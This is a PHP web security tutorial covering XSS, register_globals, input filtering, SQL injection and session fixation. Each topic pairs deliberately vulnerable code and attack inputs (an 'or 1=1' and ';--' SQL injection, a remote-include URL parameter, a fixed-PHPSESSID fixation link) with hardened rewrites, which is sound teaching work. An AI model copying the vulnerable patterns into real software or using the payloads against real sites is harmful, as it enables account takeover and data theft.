PHP Security Computer Security
overview
• XSS (CSS)
• Register_globals
• Data Filtering
• SQL Injection
• Session Fixation
Cross Site Scripting
The goal of a cross-site scripting (CSS/XSS) attack is to steal the client's cookies, or any other sensitive information that identifies the client to the web site. With the legitimate user's token at hand, the attacker can proceed to act as that user in his/her interaction with the site, that is, impersonate the user. (attention to the sample)
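The defence the slide implies but does not show is output encoding plus a cookie the page script cannot read. The block below is an added example, not code from the original slides: it reflects a constructed request parameter once unescaped and once through htmlspecialchars(), and sets the session cookie HttpOnly/Secure so that even a successful script injection cannot read document.cookie. The function names and the sample input are assumptions of this example.

```php
<?php
// Added example (not from the original slides): reflecting user input with and
// without output encoding, and marking the session cookie HttpOnly so script
// running in the page cannot read it. Names and sample input are constructed.

declare(strict_types=1);

// Vulnerable: the raw parameter is written straight into the HTML response.
function render_greeting_unsafe(string $name): string
{
    return "<p>Hello, " . $name . "</p>";
}

// Hardened: every user-controlled value is HTML-encoded for the context it
// lands in. ENT_QUOTES also encodes the single quote, so the same helper is
// safe inside attribute values; ENT_SUBSTITUTE avoids an empty string on
// invalid UTF-8 sequences.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_greeting_safe(string $name): string
{
    return "<p>Hello, " . html_escape($name) . "</p>";
}

// Call before session_start(): the session cookie is sent HttpOnly (not
// visible to document.cookie) and Secure (HTTPS only), which limits what an
// injected script can steal. The options-array form needs PHP >= 7.3.
function configure_session_cookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

if (PHP_SAPI === 'cli') {
    // Constructed input: markup supplied by the client, as in the slide's scenario.
    $input = 'Bob <script>alert(1)</script>';
    echo render_greeting_unsafe($input), PHP_EOL; // the script element reaches the browser
    echo render_greeting_safe($input), PHP_EOL;   // the browser renders it as literal text
}
```

Encoding belongs at the point of output, not at input time, because the same value may later be placed in HTML text, an attribute, a URL or JavaScript, and each context needs its own encoder.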
Register_globals
Poor Security: Login.php
    <?php
    if (authenticated_user()) {
        $authorized = true;
    }
    if ($authorized) {
        include "Access.php";
    }
    ?>
Risk: Login.php?authorized=1
Register_globals
Poor Security: Run.php
    <?php include "$path/script.php"; ?>
Risk: Run.php?path=http%3A%2F%2Fwww.mysite.com%2F%3F
    <?php include 'http://www.mysite.com/?/script.php'; ?>
If allow_url_fopen is enabled (which it is by default, even in php.ini-recommended), this will include the output of http://www.mysite.com/ just as if it were a local file.
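Both slides show the same root cause: a variable the script never initialised, or a path the script never constrained, is taken from the request. The block below is an added example, not the slides' code, rewriting Login.php and Run.php so they do not depend on the register_globals setting at all (register_globals was removed in PHP 5.4, and since PHP 5.2 a remote URL in include() additionally needs allow_url_include, which is off by default, but the pattern of trusting a request-supplied path is still a live bug). authenticated_user() is assumed to exist as on the slide; the script directory and the allow-list of script names are constructed for this example.

```php
<?php
// Added example (not from the original slides): the two Register_globals
// patterns rewritten so that no request parameter can pre-set a variable or
// choose an arbitrary include path. authenticated_user() is assumed to exist;
// the scripts directory and the allow-list below are constructed.

declare(strict_types=1);

// Login.php, hardened: the flag is initialised before use, so a request
// parameter named "authorized" can never pre-set it. The decision comes from
// the function's return value, never from a variable that may arrive from
// outside the script.
function is_authorized(): bool
{
    $authorized = false;
    if (authenticated_user()) {
        $authorized = true;
    }
    return $authorized;
}

// Run.php, hardened: the request selects a *key*, and the key is mapped to a
// fixed local file. Anything not in the map is rejected, so neither "../"
// nor a URL can ever reach include().
function resolve_script(string $requested): ?string
{
    $base = __DIR__ . '/scripts';           // constructed location
    $scripts = [                            // constructed allow-list
        'report' => $base . '/report.php',
        'export' => $base . '/export.php',
    ];
    return $scripts[$requested] ?? null;
}

function run_script(string $requested): void
{
    $path = resolve_script($requested);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    include $path;
}

// Reading the parameter explicitly from $_GET replaces the implicit global;
// the default '' maps to nothing and is rejected.
// run_script($_GET['path'] ?? '');
```

With error_reporting including E_NOTICE (E_WARNING for undefined variables in PHP 8), the original Login.php also logs an "undefined variable" notice whenever authenticated_user() is false, which is a cheap way to find this class of bug in existing code.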
Data Filtering
Filtering Examples
The following validates an email address:
    <?php
    $clean = array();
    $email_pattern = '/^[^@\s]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';
    if (preg_match($email_pattern, $_POST['email'])) {
        $clean['email'] = $_POST['email'];
    }
    ?>
Data Filtering
Filtering Examples
The following example ensures that $_POST['num'] is an integer:
    <?php
    $clean = array();
    if ($_POST['num'] == strval(intval($_POST['num']))) {
        $clean['num'] = $_POST['num'];
    }
    ?>
The following example ensures that $_POST['num'] is a float:
    <?php
    $clean = array();
    if ($_POST['num'] == strval(floatval($_POST['num']))) {
        $clean['num'] = $_POST['num'];
    }
    ?>
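The round-trip checks above rely on PHP's loose string comparison, so what they accept depends on how "==" treats numeric strings (for instance "007" and "1.0" compare equal to "7" and "1"). The block below is an added example, not from the slides: it does the same integer and float validation with filter_var(), which returns false for anything that is not a well-formed number and lets you attach a range, and runs both approaches over a few constructed inputs so the differences are visible. The function names and sample values are assumptions of this example.

```php
<?php
// Added example (not from the original slides): whitelist-style number
// validation with filter_var(), compared with the slide's strval(intval())
// round-trip on constructed inputs.

declare(strict_types=1);

// Returns the integer, or null when the string is not a canonical integer
// (leading zeros, decimals, exponents and trailing junk are all rejected).
function clean_int(string $raw, int $min = PHP_INT_MIN, int $max = PHP_INT_MAX): ?int
{
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return $value === false ? null : $value;
}

// Returns the float, or null when the string is not a well-formed float.
function clean_float(string $raw): ?float
{
    $value = filter_var($raw, FILTER_VALIDATE_FLOAT);
    return $value === false ? null : $value;
}

// The slide's round-trip check, kept here only for comparison.
function slide_is_int(string $raw): bool
{
    return $raw == strval(intval($raw));
}

// Validated values are copied into $clean exactly as the slide does, so the
// rest of the script only ever reads $clean, never $_POST directly.
function filter_num(array $post): array
{
    $clean = [];
    $num = clean_int((string) ($post['num'] ?? ''), 0, 1000);
    if ($num !== null) {
        $clean['num'] = $num;
    }
    return $clean;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: plain numbers, numbers in non-canonical forms, and
    // strings that merely start with digits.
    $samples = ['42', '-7', '007', '1.0', '1e3', '3.14', '42abc', ' 42', ''];
    foreach ($samples as $s) {
        printf("%-8s int:%-6s float:%-8s slide_int:%s\n",
            var_export($s, true),
            var_export(clean_int($s), true),
            var_export(clean_float($s), true),
            slide_is_int($s) ? 'yes' : 'no');
    }
}
```

Because FILTER_VALIDATE_INT returns the converted integer rather than the original string, the value stored in $clean is already typed, and a range such as 0..1000 is enforced in the same call instead of in a separate comparison.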
Databases and SQL Input
Keep the user name and password in a file outside the web root folder, e.g. Test/conn:
    SetEnv DB_USER "myuser"
    SetEnv DB_PASS "1234"
    SetEnv DB_HOST "myhost"
Include this file within httpd.conf as follows:
    Include "Test/conn"
Then read the values from the environment instead of hard-coding them:
    <?php
    // db.inc
    // mysql_* functions belong to the old mysql extension (removed in PHP 7; use mysqli or PDO there)
    $db = mysql_connect($_SERVER['DB_HOST'], $_SERVER['DB_USER'], $_SERVER['DB_PASS']);
    ?>
Be careful not to expose these variables with something like phpinfo() or print_r($_SERVER).
SQL Injection
WHERE Hacking
    <?php
    $db = mysql_connect("localhost", "Hawk", "3");
    mysql_select_db("user", $db);
    // User input is concatenated straight into the WHERE clause (vulnerable by design)
    $sql = "select * from user where UserName='" . $_POST['user'] . "' and Pass='" . $_POST['pass'] . "'";
    $result = mysql_query($sql);
    while ($row = mysql_fetch_array($result)) {
        echo "<h4> Name: " . $row["UserName"] . ', ' . $row["Pass"] . "</h4> \n";
    }
    mysql_close();
    ?>
SQL Injection
    $sql = "select * from user where UserName='" . $_POST['user'] . "' and Pass='" . $_POST['pass'] . "'";
    Select * from user where UserName=ym and Pass=2 or 1=1
Normal query:
    select * from user where UserName='ym' and Pass='ym'
Injected Select:
    select * from user where UserName='ym';-- and Pass=''
Prevent
• Using stored procedures
• ctype_alnum — Check for alphanumeric character(s)
• ctype_alpha — Check for alphabetic character(s)
• mysql_real_escape_string — Escapes special characters in a string for use in a SQL statement
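The block below is an added example, not the slides' code: it is the login lookup from the "WHERE Hacking" slide rewritten so that user input can never change the shape of the query. It combines the slide's ctype_alnum() check with a prepared statement, which is the counterpart of the list above that the slides do not show, and includes the escaping approach from the list for comparison. The table "user", the columns UserName/Pass and the connection details are taken from the slide; the mysqli object, get_result() (which needs the mysqlnd driver) and the prepared statement are assumptions of this example, since the slide's mysql_* functions no longer exist in PHP 7 and later.

```php
<?php
// Added example (not from the original slides): the vulnerable login query
// rebuilt with input validation and a prepared statement. Table and column
// names come from the slide; the mysqli usage is an assumption of this example.

declare(strict_types=1);

// Step 1 (the slide's ctype_* advice): reject anything that is not a short,
// plain alphanumeric user name before it gets anywhere near the database.
function valid_username(string $user): bool
{
    return $user !== '' && strlen($user) <= 32 && ctype_alnum($user);
}

// Step 2: a prepared statement. Each "?" is a bound parameter; the server
// receives the query text and the values separately, so a quote or ";--"
// inside $user or $pass is only ever data, never SQL.
function find_user(mysqli $db, string $user, string $pass): ?array
{
    if (!valid_username($user)) {
        return null;
    }
    $stmt = $db->prepare('SELECT UserName FROM user WHERE UserName = ? AND Pass = ?');
    $stmt->bind_param('ss', $user, $pass);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    // Note: the slide's table keeps Pass in clear text. In real code store
    // password_hash() output, select by UserName only and compare with
    // password_verify() after the fetch.
    return $row ?: null;
}

// Escaping (the slide's mysql_real_escape_string) is the fallback for a value
// that cannot be bound. real_escape_string() uses the connection's charset,
// and the escaped value still needs its own quotes in the SQL text; a missing
// pair of quotes turns escaping into a no-op.
function escaped_lookup(mysqli $db, string $user): string
{
    return "SELECT UserName FROM user WHERE UserName = '" . $db->real_escape_string($user) . "'";
}

// Usage with the slide's connection parameters (commented out so the file can
// be included without a database):
// $db  = new mysqli('localhost', 'Hawk', '3', 'user');
// $row = find_user($db, $_POST['user'] ?? '', $_POST['pass'] ?? '');
// echo $row === null ? 'login failed' : 'welcome ' . htmlspecialchars($row['UserName']);
```

The validation step is not what stops the injection; the bound parameters are. ctype_alnum() mainly shrinks the attack surface and gives an early, cheap rejection, while the prepared statement also protects the Pass column, whose values legitimately contain punctuation.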
Session Fixation
There are three common methods an attacker can use to obtain a valid session identifier:
1. Prediction
Prediction refers to guessing a valid session identifier. With PHP's native session mechanism, the session identifier is extremely random, and this is unlikely to be the weakest point in your implementation.
2. Capture
Capturing a valid session identifier is the most common type of session attack, and there are numerous approaches. Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been in Internet Explorer, and cookies are slightly less exposed than GET variables. Thus, for those users who enable cookies, you can provide them with a more secure mechanism.
3. Fixation
In the simplest case, a session fixation attack can use a link:
    <a href="http://host/index.php?PHPSESSID=1234">Click here</a>
Or a protocol-level redirect:
    <?php header('Location: http://host/index.php?PHPSESSID=1234'); ?>
Session Fixation
    <?php
    session_start();
    if (!isset($_SESSION['visits'])) {
        $_SESSION['visits'] = 1;
    } else {
        $_SESSION['visits']++;
    }
    echo $_SESSION['visits'];
    ?>
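The counter above accepts whatever identifier the request carries, so a visitor who followed the ?PHPSESSID=1234 link from the previous slide keeps using an id the attacker chose. The block below is an added example, not the slides' code: it keeps the same counter but configures PHP to take session ids only from cookies, to discard ids it did not generate itself, and to issue a fresh id at login and periodically. The ini settings, session_set_cookie_params() and session_regenerate_id() are real PHP APIs; the login_user() flow and the rotation interval are assumptions of this example.

```php
<?php
// Added example (not from the original slides): the slide's visit counter with
// the standard defences against session fixation. The login flow and the
// rotation interval below are assumptions of this example.

declare(strict_types=1);

// Refuse ids arriving in the URL (the slide's ?PHPSESSID=1234 link and
// redirect) and accept them only from cookies; never append the id to links.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
// Reject ids that PHP did not generate itself (PHP >= 5.5.2): an id the
// client made up is replaced with a fresh one instead of being adopted.
ini_set('session.use_strict_mode', '1');

// Cookie attributes (options-array form needs PHP >= 7.3).
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,     // HTTPS only, so the id is not sent in clear
    'httponly' => true,     // not readable from script in the page
    'samesite' => 'Lax',
]);

session_start();

// On any privilege change (typically login) throw away the id the client
// arrived with and issue a new one. An id planted before the login then no
// longer refers to the authenticated session.
function login_user(int $userId): void
{
    session_regenerate_id(true);   // true = remove the old session data as well
    $_SESSION['user_id'] = $userId;
    $_SESSION['created'] = time();
}

// Periodic rotation limits how long a captured id stays useful.
function rotate_if_stale(int $maxAgeSeconds = 1800): void
{
    if (!isset($_SESSION['created'])) {
        $_SESSION['created'] = time();
        return;
    }
    if (time() - $_SESSION['created'] > $maxAgeSeconds) {
        session_regenerate_id(true);
        $_SESSION['created'] = time();
    }
}

rotate_if_stale();

// The slide's counter, unchanged.
if (!isset($_SESSION['visits'])) {
    $_SESSION['visits'] = 1;
} else {
    $_SESSION['visits']++;
}
echo $_SESSION['visits'];
```

The ini_set() calls must run before session_start(), and session.use_strict_mode is the one that directly defeats the slide's link and redirect: with it on, an unknown PHPSESSID value is never turned into a live session, so there is nothing for the attacker to come back to.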